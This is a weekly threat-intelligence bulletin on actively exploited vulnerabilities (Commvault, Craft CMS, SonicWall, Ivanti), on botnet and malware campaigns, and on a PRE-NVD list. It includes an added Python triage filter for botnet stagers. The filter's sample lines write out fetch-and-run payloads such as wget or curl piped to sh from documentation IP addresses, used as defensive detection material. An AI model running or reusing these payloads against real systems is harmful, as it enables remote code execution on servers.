Week of Exposure: High-Impact Vulnerabilities and Threat Trends Unfold

May 2, 2025
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References

Executive Summary

In a sharp escalation, this week’s cyber activity signals how vulnerabilities in core business platforms are becoming top targets for exploitation. A critical vulnerability in the Commvault Web Server is now under active exploitation, leading to its inclusion in CISA’s Known Exploited Vulnerabilities (KEV) catalog. Simultaneously, Craft CMS, a widely used content management system among developers and digital agencies, has confirmed exploitation of a vulnerability as part of a coordinated, chained attack. Adding to the urgency, SonicWall has issued a critical advisory after detecting real-world exploitation of vulnerabilities in its Secure Mobile Access (SMA) appliances. These developments emphasize the growing threat landscape targeting core infrastructure and remote access solutions.  

Botnet operations intensified as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st exploited vulnerabilities in platforms such as Cloud Gateway, GitLab, and PHP-based systems. Simultaneously, IoT threats like Bashlite, BrickerBot, Tsunami, and Mirai ramped up attacks on Eir D1000 modems, rapidly expanding their networks of compromised devices.  

On the advanced threat front, attackers leveraged a vulnerability in Ivanti Connect Secure to deploy DslogdRAT, a stealthy remote access trojan engineered for persistence, evasion, and long-term control. In parallel, DFIR investigations into Fog Ransomware revealed abuse of legacy Microsoft Active Directory vulnerabilities for privilege escalation, demonstrating how both modern and outdated vulnerabilities are being chained for full domain compromise.  

These developments reflect the evolving strategies of threat actors, who continue to pivot rapidly between zero-days, misconfigurations, and legacy exploits to compromise critical systems and expand their footholds across enterprise environments.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed decisions.

CVE-2025-3928

An Unspecified Vulnerability in the Commvault Web Server allows an authenticated attacker to create and execute webshells on both Linux and Windows platforms. Assigned a high CVSS Score of 8.7, this flaw poses a serious threat to the affected environments. While public details regarding exploitation methods, the scale of attacks, or the identities of threat actors remain unavailable, the vulnerability's addition to the CISA's Known Exploited Vulnerabilities (KEV) catalog underscores its critical nature. Commvault has issued remediation through multiple fixed versions: 11.36.46, 11.32.89, 11.28.141, and 11.20.217.  

CVE-2025-32432

A Remote Code Execution Vulnerability in Craft CMS enables malicious actors to exploit the system through crafted HTTP requests. The vulnerability, rated CVSS 10 (Critical), has prompted Craft CMS to issue security updates in versions 3.9.15, 4.14.15, and 5.6.17. Orange Cyberdefense's CSIRT has recently identified an active campaign exploiting a combination of CVE-2025-32432 and CVE-2024-58136 as zero-days. This multi-stage attack, observed since February 2025, has been used to breach systems and exfiltrate data, underscoring the severity of the threat.  

CVE-2024-38475

A Path Traversal Vulnerability, attributed to a publicly disclosed issue in the Apache HTTP Server's mod_rewrite module, has been identified with a critical CVSS Score of 9.8. According to SonicWall's advisory, the flaw allows attackers to manipulate URLs to bypass directory restrictions, effectively mapping them to protected file system paths. Exploitation of this vulnerability can lead to unauthorized access to sensitive files and, under specific conditions, enable session hijacking. SonicWall confirmed the existence of an additional exploitation technique leveraging this flaw and noted potential in-the-wild exploitation. The issue has been addressed in SMA Series firmware version 10.2.1.14-75sv and later.

CVE-2023-44221

A Post-Authentication OS Command Injection Vulnerability has been identified in the SonicWall SMA100 SSL-VPN Management Interface, allowing a remote, authenticated attacker with administrative privileges to execute arbitrary commands as the 'nobody' user. Assigned a high CVSS Score of 7.2, the flaw was initially disclosed in December 2023. However, subsequent analysis by SonicWall indicated that the vulnerability may have been exploited in the wild. In response, SonicWall updated its security advisory and released patched firmware, starting with SMA 100 Series version 10.2.1.10-62sv and later, to address the issue and mitigate potential risk.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

Vulnerability | Product | Severity | Title | Exploited in-the-wild | CISA KEV
CVE-2024-47176 | CUPS | Medium | Improper Input Validation Vulnerability in OpenPrinting CUPS browsed through 2.0.1 leads to remote code execution | True | False
CVE-2024-4577 | PHP-CGI on Windows | High | Critical argument injection vulnerability in PHP on Windows servers | True | True
CVE-2024-3721 | TBK DVR Devices | Medium | OS Command Injection vulnerability in TBK DVR-4104 and DVR-4216 up to 20240412 | True | False
CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication Bypass vulnerability in ConnectWise ScreenConnect through 23.9.7 leads to sensitive information disclosure | True | True
CVE-2023-4415 | Ruijie RG-EW1200G 07161417 r483 | High | Improper Authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 | True | False
CVE-2023-38646 | Metabase open source and Enterprise | Critical | Remote Code Execution Vulnerability in Metabase open source and Metabase Enterprise | True | False
CVE-2023-24488 | Citrix ADC and Citrix Gateway | Medium | Cross site scripting vulnerability in Citrix ADC and Citrix Gateway | True | False
CVE-2022-41040 | Microsoft Exchange Server | High | Server-Side Request Forgery (SSRF) Vulnerability in Microsoft Exchange Server | True | True
CVE-2022-34045 | Wavlink Devices | Critical | Hardcoded encryption/decryption key vulnerability in Wavlink | True | False
CVE-2022-24847 | GeoServer's JNDI lookup mechanism | High | Improper input validation vulnerability in GeoServer leads to arbitrary code execution. GeoServer is an open-source Java-based server for sharing and editing geospatial data. | False | False
CVE-2022-22947 | Spring Cloud Gateway | Critical | Remote Code Execution vulnerability in Spring Cloud Gateway versions 3.0.0 to 3.0.6 and 3.1.0, caused by improper input handling in the exposed and unsecured Gateway Actuator endpoint | True | True
CVE-2022-2222 | Download Monitor WordPress plugin | Medium | Authenticated Arbitrary File Download vulnerability in Download Monitor WordPress plugin versions prior to 4.5.91. This vulnerability arises because the plugin does not ensure that downloadable files reside within designated blog directories, leading to a potential information disclosure risk. | True | False

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presenting the top 5 CVEs with payloads suggestive of botnet activity, such as invoking wget with bare IP addresses.

Vulnerability | Product | Title | Exploit | Abused by Botnet
CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K
CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution Vulnerability in Gitlab-Exiftool | True | Andoryu
CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st
CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai
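The "wget with bare IP addresses" heuristic above, turned into a small triage filter over sensor telemetry. This is an added example, not Loginsoft's or Cytellite's own code: the log line format, the field names and the sample lines are constructed here, and only the two path fragments the report's table names (PHPUnit's eval-stdin.php and the Spring Cloud Gateway actuator) are mapped to CVEs.

```python
import re
from ipaddress import IPv4Address, AddressValueError

# Sensor line format is an ASSUMPTION for this example (constructed, not Cytellite's real schema):
#   <timestamp> <src_ip> <method> <path> body="<request body>"
LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) body="(?P<body>.*)"$')

# The report's heuristic: a stager that fetches its next stage with wget/curl from a
# bare IPv4 address rather than a hostname is suggestive of botnet activity.
DOWNLOADER_RE = re.compile(r'\b(wget|curl)\b[^;&|"\']*?https?://(\d{1,3}(?:\.\d{1,3}){3})')

# Path fragments named in the report's botnet table, mapped to the CVE they point at.
PATH_HINTS = {"eval-stdin.php": "CVE-2017-9841",       # PHPUnit
              "/actuator/gateway": "CVE-2022-22947"}   # Spring Cloud Gateway actuator


def classify_payload(line):
    """Return a finding dict if the line carries a wget/curl-to-IPv4 stager, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    hit = DOWNLOADER_RE.search(m["body"])
    if not hit:
        return None
    stager_ip = hit.group(2)
    try:
        IPv4Address(stager_ip)  # reject octets > 255 that the regex lets through
    except AddressValueError:
        return None
    cve = next((c for needle, c in PATH_HINTS.items() if needle in m["path"]), "unmapped")
    return {"src": m["src"], "path": m["path"], "tool": hit.group(1),
            "stager_ip": stager_ip, "cve_hint": cve}


def flag_botnet_payloads(lines):
    """Filter sensor lines down to those matching the botnet-stager heuristic."""
    return [f for f in map(classify_payload, lines) if f]


# Constructed sample telemetry (RFC 5737 documentation addresses, not real IoCs).
SAMPLE_LINES = [
    '2025-04-29T10:00:01Z 198.51.100.7 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php '
    'body="<?php system(\'wget http://203.0.113.5/x.sh -O- | sh\'); ?>"',
    '2025-04-29T10:00:02Z 198.51.100.8 POST /actuator/gateway/routes/demo '
    'body="curl -s http://203.0.113.9:8080/b.sh|sh"',
    '2025-04-29T10:00:03Z 198.51.100.9 GET /index.php body=""',
    # hostname rather than a bare IP: does not match the heuristic
    '2025-04-29T10:00:04Z 198.51.100.10 POST /upload.php body="wget http://cdn.example.net/a.sh"',
]
```

Running `flag_botnet_payloads(SAMPLE_LINES)` yields two findings (the PHPUnit and Spring Cloud Gateway lines) and ignores both the benign request and the hostname-based download, so the `cve_hint` can be used to bucket sensor hits against the table above.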

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2025-0282

A recent report from the JPCERT Coordination Center (JPCERT/CC) revealed that CVE-2025-0282, a vulnerability in Ivanti Connect Secure, was actively exploited as a zero-day to deploy a stealthy remote access trojan known as DslogdRAT. At that time, the vulnerability was undisclosed and unpatched, allowing threat actors to install both the malware and a web shell, primarily targeting organizations in Japan. The security flaw was subsequently addressed by Ivanti in early January 2025, following its identification and initial exploitation. Organizations using Ivanti Connect Secure are strongly advised to apply the security updates released by the vendor to prevent potential exploitation by DslogdRAT and similar threats.

Fog Ransomware leveraging legacy Microsoft Flaws for Privilege Escalation

A recent report from the DFIR team has uncovered the operations of Fog Ransomware, which leverages multiple known Microsoft vulnerabilities to escalate privileges within targeted environments. The attackers exploited CVE-2020-1472 to gain domain controller access and further abused CVE-2021-42278 and CVE-2021-42287, both of which enable privilege escalation in Active Directory. This combination of exploits allows threat actors to move laterally and gain elevated access across compromised networks, facilitating the deployment of Fog ransomware and maximizing impact. Victims were identified across diverse sectors such as technology, education, and logistics, with incidents reported in Europe, North America, and South America, underscoring the affiliate's wide-reaching targeting strategy.

Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS
CVE-2025-0282 | Critical | A Stack-Based Buffer Overflow Vulnerability in the Ivanti Connect Secure, Policy Secure and ZTA Gateways | Yes | DslogdRAT | False
CVE-2021-42278 | High | Privilege Escalation Vulnerability in the Microsoft Active Directory Domain Services | Yes | Fog Ransomware | False
CVE-2021-42287 | High | Privilege Escalation Vulnerability in the Microsoft Active Directory Domain Services | Yes | Fog Ransomware | False
CVE-2020-1472 | Critical | Privilege Escalation Vulnerability in the Microsoft Netlogon Remote Protocol (MS-NRPC) | Yes | Fog Ransomware | True

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

CVE-ID | Type of Vulnerability | Product | Reference
CVE-2025-0092 | Sensitive Information Disclosure | Android | Resource
CVE-2025-0093 | Sensitive Information Disclosure | Android | Resource
CVE-2025-0505 | Privilege Escalation | Arista CloudVision | Resource
CVE-2025-22411 | Remote Code Execution | Android | Resource

External References

  1. https://www.cisa.gov/news-events/alerts/2025/04/29/cisa-adds-one-known-exploited-vulnerability-catalog
  2. https://www.cisa.gov/news-events/alerts/2025/04/28/cisa-adds-three-known-exploited-vulnerabilities-catalog
  3. https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html
  4. https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/#iocs
  5. https://thedfirreport.com/2025/04/28/navigating-through-the-fog/
  6. https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018
  7. https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0018
